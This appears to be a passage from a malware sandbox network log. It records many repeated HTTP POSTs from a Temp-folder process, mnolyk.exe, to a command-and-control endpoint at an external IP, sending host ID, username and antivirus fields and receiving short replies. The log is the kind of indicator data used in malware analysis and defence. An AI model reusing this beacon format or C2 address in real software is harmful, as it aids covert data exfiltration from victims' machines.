Feb 7, 2023 20:02:52.154927969 CET	560	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:52.219247103 CET	560	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
413	192.168.2.6	50137	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:52.411571980 CET	561	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:52.481930971 CET	561	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
414	192.168.2.6	50138	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:52.674592018 CET	562	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:52.740448952 CET	562	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
415	192.168.2.6	50139	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:52.924797058 CET	563	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:52.988130093 CET	563	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
416	192.168.2.6	50140	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:53.167783022 CET	564	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:53.232999086 CET	564	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
417	192.168.2.6	50141	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:53.400943041 CET	565	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:53.464102983 CET	565	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
418	192.168.2.6	50142	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:53.636956930 CET	566	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:53.700922966 CET	566	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
419	192.168.2.6	50143	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:53.873531103 CET	567	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:53.937649012 CET	567	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
42	192.168.2.6	49761	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:01.073822021 CET	149	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:01.139965057 CET	155	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
420	192.168.2.6	50144	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:54.112123966 CET	568	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:54.178194046 CET	568	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
421	192.168.2.6	50145	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:54.357855082 CET	569	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:54.420859098 CET	569	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
422	192.168.2.6	50146	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:54.625344038 CET	570	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:54.691339016 CET	570	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
423	192.168.2.6	50147	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:54.873680115 CET	571	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:54.939722061 CET	571	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
424	192.168.2.6	50148	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:55.124322891 CET	572	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:55.191257000 CET	572	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
425	192.168.2.6	50149	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:55.389817953 CET	573	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:55.454595089 CET	573	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
426	192.168.2.6	50150	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:55.620345116 CET	574	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:55.682312965 CET	574	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
427	192.168.2.6	50151	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:55.858237982 CET	575	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:55.921014071 CET	575	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
428	192.168.2.6	50152	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:56.096465111 CET	576	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:56.160877943 CET	576	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
429	192.168.2.6	50153	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:56.341247082 CET	577	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:56.404689074 CET	577	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
43	192.168.2.6	49762	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:01.308697939 CET	156	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:01.373136997 CET	156	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
430	192.168.2.6	50154	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:56.574090004 CET	578	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:56.637090921 CET	578	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
431	192.168.2.6	50155	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:56.813184023 CET	579	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
